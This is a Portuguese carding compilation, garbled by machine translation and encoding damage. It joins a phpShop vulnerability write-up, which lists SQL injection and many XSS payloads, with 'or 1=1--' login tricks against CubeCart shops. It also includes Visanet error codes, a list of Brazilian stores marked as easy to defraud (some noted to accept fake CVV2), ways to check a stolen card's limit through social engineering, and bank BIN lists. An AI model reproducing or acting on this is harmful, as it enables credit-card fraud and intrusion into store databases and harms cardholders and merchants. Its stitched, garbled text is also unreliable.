sess�o. As edi��es podem ser exploradas atrav�s da inje��o dos comandos do SQL
emitidos � vari�vel da "p�gina".

A mesma edi��o est� tamb�m atual ao adicionar um artigo ao carro de shopping

atrav�s da vari�vel do "product_id". Quando n�o como s�rio, a vari�vel offset for
tamb�m prone � inje��o do SQL.

A inje��o offset n�o � prov�vel ser explorada.

Abaixo est�o os exemplos das vulnerabilidades mencionados acima.

] do?page=[Evil_Query /?page=shop/cart&func=cartAdd&product_id=[Evil_Query /?
page=shop/browse&category_id=&offset=[Evil_Query ] deve-se tamb�m anotar que mesmo
se um atacante n�o pode com sucesso executar uma pergunta maliciosa, podem injetar
o c�digo que permite assim o local transversal Scripting. Vulnerability Da
Divulga��o Da Informa��o Do Usu�rio:

� poss�vel para um usu�rio ganhar a informa��o muita sobre todo o cliente

perguntando o m�dulo de "account/shipto". Tudo que � requerido deve ser entrado sob
um cliente v�lido. Um pode ent�o tamb�m ver a informa��o dos administradores.

Como n�s podemos ver abaixo do c�digo, n�o h� nenhuma verifica��o para ver se a
pessoa que pergunta a informa��o pertencer �s perguntas do cliente he/she. <?php se
($$user_info_id) { $$q = "SELECIONE * do user_info ONDE user_info_id='$user_info_id
'"; $$db->query($q); $$db->next_record(); }? >

Exemplo: /?page=account/shipto&user_info_id=[Valid usu�rio ID ] de usu�rio das

identifica��es o come�o geralmente em torno do n�mero 18 - 20 assim que � f�cil ao
atacante de guess. A e n�o podem ent�o ver o info de todo o cliente.
A informa��o inclui; Endere�o Nome De Nickname, Companhia, �ltimo Nome, Primeiro
Nome, Nome M�dio, Endere�o, Cidade, Estado, C�digo De Fecho de correr, Pa�s,
Telefone, N�mero De Fax. Isto n�o � obviamente bom e pode ser �til em ajudar a um
atacante em outros ataques, tais como a engenharia social, e na enumera��o da
senha.

Para n�o o mencionar viola��o extremamente a privacidade do cliente.

Vulnerabilidade Da Inje��o Do Certificado: Um atacante pode input o certificado ou

o HTML malicioso em sua informa��o do transporte.

Isto ser� executado ent�o por um administrador ou por um propriet�rio da loja ao

ver a ordem dos atacantes. Pode ser usada por um atacante mandar um administrador
realizar comandos ou executar unknowingly fun��o administrativa.

Local Transversal Scripting: O local transversal Scripting no phpShop � apenas

insano. Ocorre em quase e cada p�gina.

Este n�o � um exaggeration tampouco infelizmente. Isto ocorre porque um n�mero

grande, if.not a maioria das vari�veis que um usu�rio passa ao certificado atrav�s
do m�todo COME�AR � imprimida diretamente para selecionar usando o eco do php com
NENHUM tipo de sanitizing em tudo. Al�m disso, alguma p�gina que voc� tentar e
visitar que voc� n�o manda o acesso � vontade permitir XSS porque TODA A vari�vel
voc� passa ao m�todo come�ar ser� armazenada no formul�rio do in�cio de uma sess�o
como um campo escondido.
/?page=admin/index&GulfTech="><script>alert(document.cookie)</script > permitir� o
local transversal Scripting, estranha bastante.

Como eu disse antes, XSS � poss�vel apenas em aproximadamente cada p�gina do

phpShop, assim que eu n�o estou indo gastar as horas que fazem uma lista das
centenas dos exemplos dos vulns de XSS, mas um punhado dos exemplos � fornecido
abaixo. /?page=shop/browse&category_id="><script>alert(document.cookie)</script
> /?func="><script>alert(document.cookie)</script > /?
login="><script>alert(document.cookie)</script >
/?page=account/shipto&user_info_id="><script>alert(document.cookie)</script > /?
page=shopper/index&module_description="><script>alert(document.cookie)</script > /?
page=shopper/menu&menu_label="><script>alert(document.cookie)</script > /?
page=shopper/menu&shopper_list_mn="><script>alert(document.cookie)</script > /?
page=shopper/menu&modulename="><script>alert(document.cookie)</script > /?
page=shopper/menu&shopper_group_list_mnu="><script>alert(document.cookie)</script >
/?page=shopper/menu&shopper_group_form_mnu="><script>alert(document.cookie)</script
> /?page=vendor/index&module_description="><script>alert(document.cookie)</script >
/?page=vendor/index&menu_label="><script>alert(document.cookie)</script > /?
page=vendor/index&sess="><script>alert(document.cookie)</script >
/?page=vendor/index&leftbar_title_bgcolor="><script>alert(document.cookie)</script
> .

Para maiores Informa��es Recomendo a visita do site oficial do projeto Php-Shop

http://www.phpshop.org/
Serve mais para catar inter ta meio (**) de achar na verdade voce causa erros no
banco de dados
com as strings 1 or 1=1-- se o cabra do admin nao acertou para nao aceitar
caracteres babou
voce loga numa boa.

powered by CubeCart

e vejo os q tem store e troco o link por

/store/index.php?cat_id=1 or 1=1--

Codigos de erro da visanet - Sistema Verified By Visa

TID = N�mero �nico gerado a cada transa��o pela Visanet.

LR = C�digo de retorno da transa��o de captura
ARS = Mensagem da transa��o
Cap = Retorno do valor capturado (formato = C�digo Moeda, Valor Capturado, Casas
Decimais). Ex.: Para o valor R$ 4,50 (quatro reais e cinq�enta centavos), ser�
apresentado: 986,450,-2.
FREE = Campo de livre Digita��o

Abaixo segue o descritivo do campo LR.:

0 = Capturado com sucesso;
1 = Autoriza��o negada;
3 = Captura j� efetuada.
Os erros mais comuns em uma captura s�o:

C�d. 108
- Tentar novamente - Falha de comunica��o entre o WebServer e o servidor de POS da
VISANET.

C�d.112
- Tid inexistente
- Tentativa de Captura excedeu o limite de 5 dias (dia da compra + 5)
- Gateway da Visanet fora de opera��o

LR = C�digo de retorno da transa��o de Cancelamento

Abaixo segue o descritivo do campo LR.:

0 = Cancelada com sucesso;

1 = Cancelamento negado;
3 = Cancelamento j� efetuado.

Os erros mais comuns em um cancelamento s�o:

C�d. 108
- Tentar novamente - Falha de comunica��o entre o WebServer e o servidor de POS da
VISANET.

C�d.112
- Tid inexistente
- Tentativa de Cancelamento excedeu o limite 24 horas da Autoriza��o.
- Gateway da Visanet fora de opera��o
Falha de Comunica��o
Transa��o n�o autorizada
TIDMASTER = N�mero gerado na transa��o que apresentou erro. Ex.:
73489405115052541001.

Cancelamento da venda

TID = N�mero �nico gerado pela loja a cada transa��o. Ex.: 73489405115052541001

LR = C�digo de retorno da transa��o de Cancelamento

TID = N�mero �nico gerado a cada transa��o pela Visanet.
ARS = Mensagem da transa��o
FREE = Campo de livre Digita��o

Abaixo segue o descritivo do campo LR.:

0 = Cancelada com sucesso;

1 = Cancelamento negado;
3 = Cancelamento j� efetuado.

Os erros mais comuns em um cancelamento s�o:

C�d. 108
- Tentar novamente - Falha de comunica��o entre o WebServer e o servidor de POS da
VISANET.

C�d.112
- Tid inexistente
- Tentativa de Cancelamento excedeu o limite 24 horas da Autoriza��o.
- Gateway da Visanet fora de opera��o
- Falha de Comunica��o

Mais alguns erros

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
Loja - CBP Captura 215 TID n�o encontrado.
Loja - CBP Captura 213 TID n�o encontrado
Loja - CBP 1�. Captura 112 Fora do prazo v�lido para primeira captura.
Loja - CBP Captura 227 Valor capturado acima do permitido.
Loja - CBP Demais capturas 225 Fora do prazo v�lido para capturas
Loja - CBP Demais capturas 226 Ultrapassou n�mero total de capturas permitidas
Loja - CBP Captura 238 Tentativa de captura parcial de uma transa��o realizada com
BIN estrangeiro.
Loja - CBP Demais capturas 239 Tentativa de realiza��o da 2�. captura sem que a
primeira captura ainda n�o tenha sido realizada.
Loja - CBP Demais capturas 222 Tipo de transa��o capturada n�o compat�vel com
transa��o original
Loja - CBP Demais capturas 233 N�mero do cart�o da transa��o master inv�lido
Loja - CBP Demais capturas 234 Validade do cart�o da transa��o master inv�lida
Loja - CBP Demais capturas 236 Valor para captura parcial inv�lido

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
Loja - CBP Re-submiss�o 215 TID n�o encontrado
Loja - CBP Re-submiss�o 213 TID n�o encontrado
Loja - CBP Re-submiss�o 218 Fora do prazo v�lido para re-submiss�es
Loja - CBP Re-submiss�o 235 Ultrapassou o n�mero total de re-submiss�es permitidas
Loja - CBP Re-submiss�o 237 N�o � permitido re-submeter uma transa��o com esse
c�digo de negada.
Loja - CBP Re-submiss�o 222 N�o � permitido re-submeter este tipo de transa��o
(Electron ou Visa Vale).
Loja - CBP Re-submiss�o 219 Tentativa de re-submiss�o de uma transa��o realizada
com BIN estrangeiro.
Loja - CBP Re-submiss�o 223 Tipo de transa��o re-submetida n�o compat�vel com a
transa��o original
Loja - CBP Re-submiss�o 217 N�o encontrou dados financeiros na transa��o master.
Loja - CBP Re-submiss�o 220 Transa��o master � uma transa��o re-submetida. N�o
permite re-submiss�o
Loja - CBP Re-submiss�o 233 Transa��o master � uma transa��o re-submetida. N�o
permite re-submiss�o
Loja - CBP Re-submiss�o 234 Validade do cart�o da transa��o master inv�lida

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
CBP - MPI Venda 191 Falha de comunica��o durante o processo de autentica��o (MPI).
CBP - MPI Venda 192 Falha de comunica��o durante o processo de autentica��o (MPI).

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
CBP - Banco Venda 100 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.
CBP - Banco Venda 110 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.
CBP - Banco Venda 120 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
CBP - Banco Venda 130 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.
CBP - Banco Venda 140 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.
CBP - Banco Venda 160 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
CBP - Banco Venda 170 Transa��o n�o autorizada. Op��o loja.
(N�o � poss�vel re-submeter esta transa��o).
CBP - Banco Venda 150 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o.
CBP - Banco Venda 180 Falha de comunica��o entre Visanet e banco durante o processo
de autentica��o

Etapa do Processo Tipo de opera��o Situa��es

C�digo Descri��o
CBP - Host Todas 98 Visanet indispon�vel para processar a transa��o no momento.
CBP - Host Venda 00 Transa��o autorizada.
CBP - Host Venda 01 Transa��o negada. (N�o � poss�vel re-submeter esta transa��o).
CBP - Host Venda 02 Transa��o negada. Referida.
(N�o � poss�vel re-submeter esta transa��o).
CBP - Host Venda 03 Transa��o negada. Estabelecimento inv�lido.
(N�o � poss�vel re-submeter esta transa��o).
CBP - Host Venda 04 Transa��o negada.(N�o � poss�vel re-submeter esta transa��o).

CBP - Host Venda 06 Problemas ocorridos na transa��o eletr�nica.

CBP - Host Venda 07 Transa��o negada. (N�o � poss�vel re-submeter esta transa��o).
CBP - Host Venda 11 Transa��o autorizada.
CBP - Host Venda 15 Emissor sem comunica��o.
CBP - Host Venda 19 Refa�a a transa��o
CBP - Host Venda 21 Transa��o n�o localizada..
CBP - Host Venda 22 Parcelamento inv�lido.
CBP - Host Venda 25 N�mero do cart�o n�o foi enviado.
CBP - Host Venda 28 Arquivo indispon�vel.
CBP - Host Venda 41 Transa��o negada.

CBP - Host Venda 52 Cart�o com d�gito de controle inv�lido.

CBP - Host Venda 53 Cart�o inv�lido para essa opera��o
CBP - Host Venda 54 Transa��o negada. Cart�o vencido.

CBP - Host Venda 62 Transa��o negada.

CBP - Host Venda 63 Transa��o negada.
CBP - Host Venda 65 Transa��o negada.
CBP - Host Venda 75 Transa��o negada.
CBP - Host Venda 76 Problemas com n�mero de refer�ncia da transa��o.
CBP - Host Venda 77 Dados n�o conferem com mensagem original.
CBP - Host Venda 80 Data inv�lida.
CBP - Host Venda 81 Erro de criptografia.
CBP - Host Venda 82 Transa��o negada.
CBP - Host Venda 83 Erro no sistema de senhas.
CBP - Host Venda 85 Erro m�todos de criptografia.
CBP - Host Venda 86 Refa�a a transa��o.
CBP - Host Venda 91 Emissor sem comunica��o.
CBP - Host Venda 93 Transa��o negada.

CBP - Host Venda 94 Transa��o negada. (N�o � poss�vel re-submeter).

CBP - Host Venda 96 Falha no sistema.
CBP - Host Venda 98 Emissor sem comunica��o.
CBP - Host Venda 99 Emissor sem comunica��o. SITEF.
CBP - Host Venda 08 Transa��o negada.(N�o � poss�vel re-submeter).

CBP - Host 1�. captura 00 Primeira captura realizada com sucesso

CBP - Host 1�. captura 01 N�o foi poss�vel realizar a primeira captura.
CBP - Host Captura 00 Transa��o autorizada.
CBP - Host Captura 01 Transa��o negada. Referida.
CBP - Host Captura 02 Transa��o negada. Referida.
CBP - Host Captura 03 Transa��o negada. Estabelecimento inv�lido.
CBP - Host Captura 04 Transa��o negada.
CBP - Host Captura 05 Transa��o negada.
CBP - Host Captura 06 Problemas ocorridos na transa��o eletr�nica.
CBP - Host Captura 07 Transa��o negada.
CBP - Host Captura 11 Transa��o autorizada.
CBP - Host Captura 12 Transa��o inv�lida.
CBP - Host Captura 13 Valor inv�lido
CBP - Host Captura 14 Cart�o inv�lido
CBP - Host Captura 15 Emissor sem comunica��o.
CBP - Host Captura 19 Refa�a a transa��o
CBP - Host Captura 21 Transa��o n�o localizada.
CBP - Host Captura 22 Parcelamento inv�lido
CBP - Host Captura 25 N�mero do cart�o n�o foi enviado.
CBP - Host Captura 28 Arquivo indispon�vel.
CBP - Host Captura 41 Transa��o negada.
CBP - Host Captura 43 Transa��o negada.
CBP - Host Captura 51 Transa��o negada.
CBP - Host Captura 52 Cart�o com d�gito de controle inv�lido.
CBP - Host Captura 53 Cart�o inv�lido para essa opera��o.
CBP - Host Captura 54 Transa��o negada. Cart�o vencido.
CBP - Host Captura 55 Transa��o negada. Senha inv�lida.
CBP - Host Captura 57 Transa��o n�o permitida.
CBP - Host Captura 61 Transa��o negada.
CBP - Host Captura 62 Transa��o negada.
CBP - Host Captura 63 Transa��o negada.
CBP - Host Captura 65 Transa��o negada.
CBP - Host Captura 75 Transa��o negada.
CBP - Host Captura 76 Problemas com n�mero de refer�ncia da transa��o.
CBP - Host Captura 77 Dados n�o conferem com mensagem original.
CBP - Host Captura 80 Data inv�lida.
CBP - Host Captura 81 Erro de criptografia.
CBP - Host Captura 82 Transa��o negada.
CBP - Host Captura 83 Erro no sistema de senhas.
CBP - Host Captura 85 Erro m�todos de criptografia.
CBP - Host Captura 86 Refa�a a transa��o.
CBP - Host Captura 91 Emissor sem comunica��o..
CBP - Host Captura 93 Transa��o negada.
CBP - Host Captura 94 Transa��o negada.
CBP - Host Captura 96 Falha no sistema.
CBP - Host Captura 98 Emissor sem comunica��o.
CBP - Host Captura 99 Emissor sem comunica��o. SITEF.

Como funciona uma transa��o com cart�o Visa (Verify-by-Visa)

1 - O cliente escolhe como forma de pagamento cart�o Visa ou VisaElectron.

2 - Um conjunto de programas ( Dll�s e Exe ) instalados na loja criptografa os
dados da compra
(Cesta de compras) e envia para o servidor de pagamentos da Visanet.
3 - O Servidor de pagamentos recebe os dados da compra e se a chave de criptografia
estiver
correta, abrir� uma nova janela onde o portador ir� digitar o BIN (6 primeiros
D�gitos) do seu
cart�o VISA.
4 - Ap�s a Visanet identificar que o BIN do cart�o est� participando do processo
VbV ele ser�
direcionado para a tela de autentica��o do Banco emissor, caso o BIN n�o participe
ele devera
digitar o restante do n.� cart�o seguido do c�digo de seguran�a (cvv2).
5 - O Sistema da Visanet ira passar a sess�o do browser (navegador) ao banco
emissor.
6 - O Emissor ir� solicitar uma identifica��o do portador.
7 - O Portador vai se identificar na tela do banco emissor.
8 - O banco emissor vai passar para a Visanet a sess�o do Browser junto com o
cart�o escolhido
pele portador e a sua validade.
9 - A Visanet iniciar� o processo de autoriza��o da Cesta de compras, junto ao
servidor de POS.
10 � 0 Servidor de POS ir� acionar o Sitef que ir� formatar a mensagem de acordo
com o padr�o
internacional de transa��es de cart�es de cr�dito.
11 - O Sitef enviar� os dados da transa��o para os sistemas de autoriza��o da Visa
que ira
acionar o emissor do cart�o.
12 - O emissor responder� com um c�digo, determinando se a transa��o foi autorizada
ou negada.
(Conforme tabela na p�g. 25).
13 - O Sitef devolve o c�digo ao servidor de POS.
14 - O servidor de POS devolver� o c�digo de resposta do emissor juntamente com o
"TID"
(Transaction ID), para o Servidor de pagamentos
15 - O Servidor de pagamentos devolvera para a servidor da loja os dados da
transa��o, para que
seja feita uma captura (confirma��o) posteriormente.
16 - A loja envia ao cliente uma p�gina de resposta (aprovado ou negado).

Index.asp: Apresenta��o da Loja de exemplo e das etapas da loja at� a realiza��o de

uma transa��o.
Pagina01.asp: P�gina para a compra de um produto.
Pagina02.asp : Esta p�gina capta os dados do cliente para criar o campo order.
Pagina03.asp: Nesta p�gina, o cliente escolhe o meio de pagamento �Cart�o Visa�.
Pagina04.asp: Nesta p�gina, o cliente dever� escolher e o prazo de pagamento, se �
a vista ou parcelado lojista ou parcelado emissor do cart�o.
Pagina05.asp: Esta p�gina capta todos os dados da compra e aciona o componente que
ir� se comunicar com a Visanet.
Pagina06.asp: Esta p�gina recebe os dados da transa��o se ela foi aprovada ou
Negada.
Captura.html: Esta p�gina efetua a Captura (confirma��o) da compra.
Statuscaptura.asp: Esta pagina recebe os dados da captura da compra.
Cancel.html: Esta p�gina efetua o Cancelamento da compra.
StatusCancel.asp: Esta pagina recebe os dados do cancelamento da compra.
Ressubmiss�o.asp: Esta pagina reenvia as transa��es que n�o foram autorizadas
conforme tabela de erros.
StatusRessubmiss�o.asp: Esta pagina recebe os dados da Re-submiss�o da compra.
CaptureBalance.asp: Esta pagina voc� pode efetuar capturas parciais de uma compra.
Statuscapturebalance.asp: Esta pagina recebe os dados das capturas parciais.

Link�s:

Sites Cardables

INFORM�TICA

www.kabum.com.br - Informatica
www.lojavirtual.angrasys.com.br - Inform�tica
www.kalunga.com.br - Inform�tica
www.todays.com.br - Inform�tica (vo testa)
www.goldline.com.br - Inform�tica
www.rbcom.com.br - Inform�tica
www.intrabox.com.br - Inform�tica (vo testa)
www.imagemrio.com.br - Inform�tica
www.eashop.com.br - Jogos de computador
www.itautecshop.com.br - Inform�tica
www.katalogo.com.br - Itilitarios/Jogos
www.nwi.com.br - Inform�tica
www.superkit.com.br - Inform�tica (vo testa)
www.trendshop.com.br - Inform�tica / Eletr�nico / S� ser�o aceitos BR
www.updatesystems.com.br - Inform�tica
www.lrshop.com.br/ - Inform�tica

https://ssl88.locaweb.com.br/comput...v3/detalhes.asp - cc br full /Visa ou Master

www.amx.com.br/GWSExpress/ - Inform�tica
www.amx.com.br/pontobr/ - Inform�tica
www.amx.com.br/shopdamidia/ . Inform�tica
www.jet.com.br/starcomputer/ - Inform�tica
www.jet.com.br/evertek/ - Inform�tica
www.ecenter.com.br/acesso/ - Inform�tica
www.ecenter.com.br/elyte/ - Inform�tica
www.ecenter.com.br/fbl/ - Inform�tica
www.tomorrow.com.br - Inform�tica
www.inforgates.com.br - Inform�tica
www.unisys.com.br - Inform�tica
www.strcomp.com.br - Inform�tica
www.farahs.com.br - Inform�tica
www.2sinfo.com.br/capa.asp - Inform�tica
www.3dsystem.com.br - Inform�tica
www.softwayinformatica.hpg.ig.com.br - Inform�tica
www.pluguse.com.br - Informatica
www.menainformatica.com.br - Inform�tica
www.laptopexchange.com - Inform�tica
www.4you.com.br - Inform�tica
www.digimer.com.br - Inform�tica
www.rbcom.com.br - Inform�tica
www.jet.com.br/evertek/ - Inform�tica Eletr�nicos
www.fnac.com.br - Livros e Artigos Inform�tica
www.axcelbooks.com.br - Livros Inform�tica
www.livros.com.br/alvo.asp - Livros Inform�tica
www.temporeal.com.br - Livros Inform�tica
www.livrosdeinformatica.com.br - Livros Inform�tica
www.tecnomidia.com.br - Cds Virgens
http://loja2001.telepac.pt/ - Modem Adsl
www.kitrecarga.bpg.com.br/new /produtos - Cartuchos
www.laptopshop.com.br - Notebooks
www.optikal.com.br - Hardware

www.mouses.com.br / Mouses/ (Tudo Pra sua Lan House) Aceita apenas visa !

www.infobox.com.br - Mastercard/dinners/visa - cds de informatica

www.wisenetwork.com.br/default.asp Informatica

www.macfix.com

www.intersol.com.br - Inform�tica / Visa / Amex / Mastercard (Credicard).

www.a1nettrading.com.megaloja.com - Eletr�nico/Inform�tica | Aceita CC Inter

Eletr�nicos

www.eletrocity.com - Master / Dinners / Visa full , se n�o for full ir� pedir
documentos !
www.ishop21.com.br -
www.etronics.com.br - Amex / Master / Visa / Dinners, Sistema Redecard,visa net ...
www.colombo.com.br - Aceitam Visa / Mastercard / Diners / Amex
www.qualivillas.com.br
www.ogbshop.com.br - Visa BR full
www.vilson.com.br - Eletronicos
www.bannana.com.br - Visa Br Full
www.najashop.com -
www.bitscompras.com.br - Aceitam Visa / Mastercard / Diners / Amex
www.eletronicstore.com.br -Visa / Master / Amex
www.ambientair.com.br - Eletr�nicos
www.lojavilson.com.br - Eletr�nicos
www.dshop.com.br - Eletr�nicos
www.polishop.com.br - Eletr�nicos
www.pluguse.com.br - Eletr�nicos
www.tecnomania.com.br - Eletr�nicos
www.dishop.com.br - Eletr�nicos
http://compras.importexpress.com.br - Eletr�nicos
www.manlec.com.br - Eletr�nicos
www.eletrocity.com.br - Eletr�nicos
www.eletronicstore.com.br/index.asp - Eletr�nicos
www.lojaclick.com.br - Eletr�nicos
www.casionet.com.br - Eletr�nicos
www.lojasarno.com.br/ - Eletr�nicos
www.novomundo.com.br - Eletr�nicos
www.efacil.com.br - Eletr�nicos
www.samsung.com.br/ - Eletr�nicos
www.ibmega.com - Eletr�nicos
www.brasilshop.com.br - Eletr�nicos
www.lacer.com.br - Eletr�nicos
www.comprafacil.com.br - Eletr�nicos
www.olivetti.com.br/ - Eletr�nicos
www.jet.com.br/juaosom/ - Eletr�nicos
www.bernasconi.com.br - Eletr�nicos
www.directstore.com.br/loja/loja.asp ?COD_LOJA= - Eletr�nicos LG

www.dvdnow.com.br - Eletr�nicos DVD

www.jet.com.br/fastcolor/ - M�quinas Fotogr�ficas e Digitais

www.beephoto.com.br - Artigos Fotogr�ficos
www.focusfilme.com.br - M�quinas Fotogr�ficas
www.fotoptica.com.br - M�quinas Fotogr�ficas
www.videosonic.com.br - Filmadoras / Aceitam Visa / Mastercard / Diners / Amex
www.panashop.com.br - �udio V�deo
www.bside.com.br - Artigos Discoteca
www.showpoint.com.br/ - Luzes Discoteca
www.videosonic.com.br - Som Discoteca
www.videokestore.com.br - Artigos Videoke
www.showpoint.com.br - �udio Instrumentos Musicais

Celulares

http://shopping.motorola.com.br - Celulares
www.vivo.com.br- Celulares
www.atl.com.br - Celulares(Claro)
www.amx.com.br/celulares - Celulares
www.mdxtelecom.com.br - Celulares

Esportes

www.mundodofutebol.com - Artigos Esportivos / CC BR APENAS

www.timesetorcidas.com.br - Artigos Esportivos | Compras Internacionais n�o poder�o
ser parceladas.
www.futebolshopping.com.br - Artigos Esportivos
www.roxosedoentes.com.br - Artigos Esportivos
www.bylu.com.br - Roupas Esportivas
www.ginastic.com.br - Artigos Gin�stica Lazer
www.caloi.com.br - Bicicletas
www.extremefight.com.br - Artigos Jiu-Jitsu
www.sncshop.com - Suplementos
www.rumo.com.br/ciadasvitaminas - Suplementos
www.brasilnutrition.com.br - Suplementos
www.corpoperfeito.com.br - Suplementos

www.performancesportiva.com.br - Suplementos - br,moset sedex se passar de 300

desconfiam e pedem docs

www.creatina.com.br - Creatina / Visa / Amex / Master / Dinners

Roupas

www.marisa.com.br - cc br full,pode colocar cvv2 falso,entrega por sedex at� 2 dias

pra confirmarem
www.timberland.com.br - Cal�ados
www.taco.com.br - Roupas
www.tuttobianco.com.br - Roupas
www.viadireta.com.br - Roupas
www.brunominelli.com.br - Roupas
www.boardshop.com.br - Roupas
www.adji.com.br - Roupas
www.divestation.com.br - Roupas Mergulho e Rollers
www.cuecasonline.com.br - Cuecas
www.proshoptenis.com.br - Artigos para T�nnis

Papelaria Livros/Cds/Dvds/Games/M�sica

www.papelariareal.com.br - Papelaria
www.videotecapremiere.com.br - Dvds Games
www.pacificmusic.com.br - Cds e Dvd
www.2001video.com.br - V�deos DVD
www.arenadvd.com.br - DVD
www.cdpoint.com.br - CDS DVDS
www.dvdinternet.com.br - DVDS
www.dvdworld.com.br - DVDS
www.videonorte.com.br - Cds Dvds
www.lojasupergames.com.br - Aparelhos e Jogos Games
www.joystick.com.br - Joystick Micro
www.diskgames.com.br - Gam

www.imusica.com.br / Compre m�sicas online / Mastercard / Dinners

Perfumes

www.aperfumista.com.br - Perfumes
www.perfumaria.com.br - Perfumes
www.perfumes.com.br - Perfumes
www.perfumesfamosos.com.br - Perfumes
www.redemarket.com.br - Perfumes
www.mundialperfumes.com.br - Perfumes
www.aguadecheiro.com.br - Perfumes
www.sacks.com.br - Perfumes Maquiagem
www.lacquadifiori.com.br - Perfumes
www.novoestilo.com.br - Perfumes/�culos/Canetas
www.avon.com.br - cc Full,moset, ta (**) passar l� !

www.kapella.com.br/site - Master/Dinners cc inter

J�ias
www.joiasja.com.br - J�ias
www.joalheria.net - J�ias

Rel�gios
www.toptime.com.br - Rel�gios
www.clocksite.com.br - Rel�gios
www.victorinoxnet.com.br - Rel�gios/Canivetes

Flores

www.abigailcestas.com.br - Cestas e Flores

www.floresonline.com.br - Cestas e Flores
www.lembreidevoce.com.br - Flores e Presentes
www.patrocinio.com.br - Flores
www.giulianaflores.com.br - Flores
www.uniflores.com.br - Flores

www.florasavassi.com.br - Flores

M�veis

www.clickcasa.com.br - M�veis Decora��o

www.lojadolar.com - M�veis
www.mmartan.com.br - Cama/Mesa e Banho
www.lojaskd.com.br - M�veis
www.zelo.com.br . Cama/Mesa e Banho

www.lojaskd.com.br - Visa/Master/Dinners - n�o pede fatura ate 600 e so cc br full

Trasportes
www.rodao.com.br/ - Rodas Carro
www.amx.com.br/sanautica/ - Barcos
www.motostore.com.br - Pe�as de Motos
www.rumo.com.br/amomeucarro - Pe�as de Carro

Comidas/Sa�de_test

www.pizzahutsp.com.br - Pizza
www.winehouse.com.br - Vinho
www.docepecado.com.br - Chocolates
www.rumo.com.br/doces - Doces/Chocolates
www.fec.com.br - Farm�cia
www.panvel.com.br - Farm�cia
www.saudestore.com.br - Artigos Saude

www.drogasmil.com.br

Brinquedos

www.brincando.com.br - Brinquedos
www.rihappy.com.br - Apenas cc BR = Visa / Mastercard / Dinners / Amex
www.1000teddybears.com - Todos cart�es de cr�dito.
www.burago.com.br - Miniaturas de Carros / Visa / Dinners / Amex / Master
www.rumo.com.br/kfc - Ber�os e coisas Crian�as
www.toymania.com.br - Moset / s� cc br full

Ingressos/Passagens

www.ingressofacil.com.br - Ingressos
www.ticketmaster.com.br - Ingressos
www.voegol.com.br - Passagens A�reas
www.decolar.com.br - Passagens A�reas

Geral

www.ironman.com.br - Geral
www.jet.com.br/nakamura - Geral
www.pontofrio.com.br - Geral
www.shoptime.com - Geral / br full, nunca do sorte =\ sedex at� 4 dias pra
confirmarem
www.extra.com.br - Geral / br full se n�o ir� pedir documentos ,1 dia para passar
www.magazineluiza.com.br - Geral
www.casaevideo.com.br - Geral
www.fastshop.com.br - Geral
www.polishop.com.br - cc inter e br, site moset.
www.stts.com.br - Geral
www.brasifshopping.com.br - Geral

www.siciliano.com.br - cc inter e br,sendo o primeiro muito dificilde aprovarem,

pode colocar cvv2 falso,entrega por sedex at� 2 dias pra confirmarem

Dom�nios
www.register.com
www.winsave.com
www.locaweb.com.br
www.gsweb.com.br- Hospedagem

Outros

www.iberiaespadas.com.br - Espadas
www.terranossa.com.br . Enfeites
www.zipposhop.com.br - Isqueiros
www.rumo.com.br/adultmall - Cds Pornogr�ficos
www.rumo.com.br/escritorioecia - Artigos Escrit�rio
www.rumo.com.br/pepemodelismo - Modelismo
www.sfhobbies.com.br - Modelismo
www.vivacce.com.br - Bolsas e Malas
www.gazin.com.br - Eletrodom�sticos
www.kilar.dock.com.br - Eletrodom�sticos
www.realmarine.com.br - Artigos para Navega��o
www.lojadolar.com - Artigos Cozinha
www.dragonetti.com.br - Utilit�rios de cozinha
www.spy.com.br - Rayban SPY
www.arcoeflecha.com.br - Artigos Acampamento
www.zionoutdoor.com.br - Artigos Acampamento
www.martinelli.com.br - Camping em Geral
www.armas.com.br - Armas de Fogo
www.hsternhome.com.br - Cristais
www.bettega.com.br - Cristais Porcelanas
www.sexxyshop.com.br - Compre seus Vibradores

Saber o limite do Cartao

Para voc� ter certeza que seu pedido ir� passar voc� precisa saber pelo menos o
limite do cc n�?
Bem infelizmente para nossa tristeza alguns bancos na hora que liga para saber o
saldo eles pedem um monte de coisas antes
e neste caso e mais dificil.
Bem mais como vou saber qual o banco emissor do cartao:

4128 7541 3218 0366

/ |
| |__ esses tr�s n�meros correspondem ao banco emissor do CC
|______ aqui a operadora do CC
|
|_ 3 = American Express
|_ 4 = Visa
|_ 5 = MasterCard
|_ 6 = Discover

Bem entao vamos la voce vai ter que ligar para o telefone do banco para atendimento
eletronico e muitas das vezes e
uma gravacao melhor ainda e mais tranquilo. Bem sendo a gravacao voce somente tera
que apertar as teclas informadas.
Depois de apertar as opcoes voc� vai ouvir o saldo atual, limite e quanto voc�
ainda vai poder gastar que beleza heim.
Para os bancos que n�o � atendimento eletronico,voc� ira precisar usar toda sua
engenharia social.

Uma Forma bem rapida e voce ligar para VisaNet e eles informarao o banco e o 0800
do banco.

0800788472 => visa

0800784411 => master

Se voce quer testar o seu cartao podera testar no site www.uol.com.br www.globo.com
e tem outros e so ir na secao
assinatura preencher os dados pedidos pois os sites sao moset e testao o cartao na
hora.

----------------------------------------------------------------------

Tabela de limites dos cartoes

Ourocard Visa 2 DATAS minimo 8.000,00 maximo 30.000,00

Ourocard Visa/MasterCard minimo 2.000,00 maximo 12.000,00
Visa Facil c/ limite zero maximo 1.000,00
MasterCard c/ limite zero maximo 1.000,00
Visa Facil maximo 3.000,00
MasterCard maximo 3.000,00
Ourocard Visa/MasterCard maximo 50.000,00
Ourocard 2 Datas maximo 60.000,00

----------------------------------------------------------------------

Bradesco

Master Card

548045
548046
548293
549159
552530
552531
554298
554299
555040
558285
558294
544838

Visa

411801
430951
430952
426372
426373
426374
423942
423700
411802
411804
449137
456508
433470
433471
433472
433473
438000
438001
438002
438003
438004
438005
438006
438007
438008
438009
438010
438011
